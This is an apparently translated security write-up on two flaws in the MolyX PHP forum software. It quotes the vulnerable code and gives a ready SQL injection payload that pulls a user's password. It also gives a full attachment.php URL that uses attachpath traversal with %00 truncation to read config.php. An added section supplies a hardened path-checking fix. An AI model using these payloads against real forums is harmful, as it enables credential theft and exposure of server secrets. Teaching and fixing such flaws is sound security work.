by:xhm1n9
MolyX used to have quite a large download base, but it has since faded. I remember looking at this program when I first started learning PHP but not being able to find a bug. Today I happened to come across a forum running it and really wanted to know how its security has improved since then. Unfortunately it is still not great~~~ The vulnerabilities are fairly simple, so I am writing them up as examples for classmates who are just starting to explore PHP vulnerabilities!
1. SQL injection in includes/db/db_base.php
function insert($table, $array, $type = 'INSERT', $func = 'query_unbuffered')
{
    if (($sql = $this->sql_insert($table, $array, $type)))
    {
        return $this->$func($sql);
    }
    return false;
}
Now look at the sql_insert() function:
function sql_insert($table, $array, $type = 'INSERT', $prefix = 'INSERT')
{
    if (!is_array($array) || empty($array))
    {
        return false;
    }
    return "$prefix INTO $table " . $this->sql_clause($type, $array);
}
Then look at the sql_clause() function:
function sql_clause($query, $array)
{
    if (!is_array($array))
    {
        return false;
    }
    $query = strtoupper($query);
    $fields = $values = '';
    if ($query == 'INSERT' || $query == 'INSERT_SELECT')
    {
        foreach ($array as $key => $var)
        {
            $fields .= ', `' . $key . '`';
            if (is_array($var) && is_string($var[0]))
            {
                // INSERT SELECT
                $values .= ', ' . $var[0];
            }
            else
            {
                $values .= ', ' . $this->validate($var);
            }
        }
        $fields = substr($fields, 2);
        $values = substr($values, 2);
        $query = ($query == 'INSERT') ? ' (' . $fields . ') VALUES (' . $values . ')' : ' (' . $fields . ') SELECT ' . $values . ' ';
    }
    ....................................... (irrelevant code omitted)
In $values .= ', ' . $var[0]; the variable $var[0] is not wrapped in single quotes and is not passed through validate(); that is where the problem arises!!
Note, however, that init_input() in global.php filters the global variables, replacing array(' ', '<!--', '-->', '>', '<', '"', '!', "'", "\n", '$', "\r") with array(' ', '<!--', '-->', '>', '<', '"', '!', ''', '', '$', '').
Exploitation: search for calls to $DB->insert(), trace whether the second argument contains a variable we control, and then build the request according to the code flow.
For example: $aa[]=0,(select+password+from+mxb_user+where+id=1),0,0)%23
2. Source code disclosure vulnerability
attachment.php
function showthumb()
{
    global $DB, $forums, $_INPUT, $bbuserinfo, $bboptions;
    $forums->noheader = 1;
    ...............................
    else
    {
        $subpath = SAFE_MODE ? "" : implode('/', preg_split('//', intval($_INPUT['u']), -1, PREG_SPLIT_NO_EMPTY));
        $subpath = $_INPUT['attachpath'] ? $_INPUT['attachpath'] : $subpath;
        $path = $bboptions['uploadfolder'] . '/' . $subpath;
        $_INPUT['attach'] = str_replace("\\", "/", $_INPUT['attach']);
        $_INPUT['attach'] = str_replace("/", "", substr($_INPUT['attach'], strrpos($_INPUT['attach'], '/')));
        $showfile = $path . "/" . $_INPUT['attach'];
        .....................................
        if (file_exists($showfile) AND ($forums->cache['attachmenttype'][ $_INPUT['extension'] ]['mimetype'] != ""))
        {
            @header('Cache-control: max-age=31536000');
            @header('Expires: ' . gmdate("D, d M Y H:i:s", TIMENOW + 31536000) . ' GMT');
            @header('Content-Type: ' . $forums->cache['attachmenttype'][$_INPUT['extension']]['mimetype']);
            @header('Content-Disposition: inline; filename="' . urldecode($_INPUT['filename']) . '"');
            @header('Content-Transfer-Encoding: binary');
            @header('Content-Length: ' . (string) (filesize($showfile)));
            @readfile($showfile);
            exit();
        }
        ..........................................
$_INPUT['attach'] is filtered fairly strictly, but $_INPUT['attachpath'] is not filtered at all, and because the system calls stripslashes() during initialisation we can use %00 to truncate the rest of the path!
Exploitation: post a thread on the forum with an attachment, grab the download URL, and change attachpath to any file:
www.xx.com/attachment.php?do=showthumb&id=21&u=6&extension=jpg&attach=8_1275811008_082.jpg&filename=test.jpg&attachpath=../../includes/config.php%00
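From the fixing side, the following is an added example (not code from MolyX or from this post's author) of how the path assembly in showthumb() should have been done: reject control bytes and traversal segments up front, then confirm the canonical path is still under the upload root before readfile() is ever reached. The function name and the constructed temp-directory layout are assumptions.

```php
<?php
// Added example (not MolyX code): hardened replacement for the path
// assembly in attachment.php::showthumb(). Function name is hypothetical.
// Returns the canonical path of the attachment, or null when any input
// would resolve outside $uploadfolder.
function resolve_attachment_path(string $uploadfolder, string $subpath, string $attach): ?string
{
    // 1. Reject NUL and other control bytes in either component: an embedded
    //    "\0" is exactly what let attachpath=...%00 truncate the path.
    if (preg_match('/[\x00-\x1f\x7f]/', $subpath . $attach)) {
        return null;
    }
    // 2. $attach must be a bare file name: no separators, no "." or "..".
    if ($attach === '' || $attach === '.' || $attach === '..' || $attach !== basename($attach)) {
        return null;
    }
    // 3. $subpath may be empty (the SAFE_MODE case) or consist only of simple
    //    segments such as the digits MolyX derives from intval($u).
    if ($subpath !== '') {
        foreach (explode('/', $subpath) as $seg) {
            if (!preg_match('/^[A-Za-z0-9_-]+$/', $seg)) {
                return null; // rejects "", ".", "..", backslashes, etc.
            }
        }
    }
    // 4. Canonicalise and confirm the result still lives under the upload root
    //    (this also defeats symlinks planted inside the upload tree).
    $root = realpath($uploadfolder);
    $real = realpath(rtrim($uploadfolder . '/' . $subpath, '/') . '/' . $attach);
    if ($root === false || $real === false) {
        return null;
    }
    if (strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Self-check against a constructed upload tree under the system temp dir.
$base = sys_get_temp_dir() . '/molyx_demo_' . getmypid();
mkdir("$base/uploads/6", 0700, true);
touch("$base/uploads/6/8_1275811008_082.jpg");
file_put_contents("$base/config.php", "<?php // constructed secret\n");
var_dump(resolve_attachment_path("$base/uploads", '6', '8_1275811008_082.jpg'));
var_dump(resolve_attachment_path("$base/uploads", "../config.php\0", '8_1275811008_082.jpg'));
var_dump(resolve_attachment_path("$base/uploads", '..', 'config.php'));
foreach (["$base/uploads/6/8_1275811008_082.jpg", "$base/config.php"] as $f) unlink($f);
foreach (["$base/uploads/6", "$base/uploads", $base] as $d) rmdir($d);
```

Only the first call returns a path; the NUL-byte and traversal attempts are refused before any filesystem call sees them, which is the check missing from the original $_INPUT['attachpath'] handling.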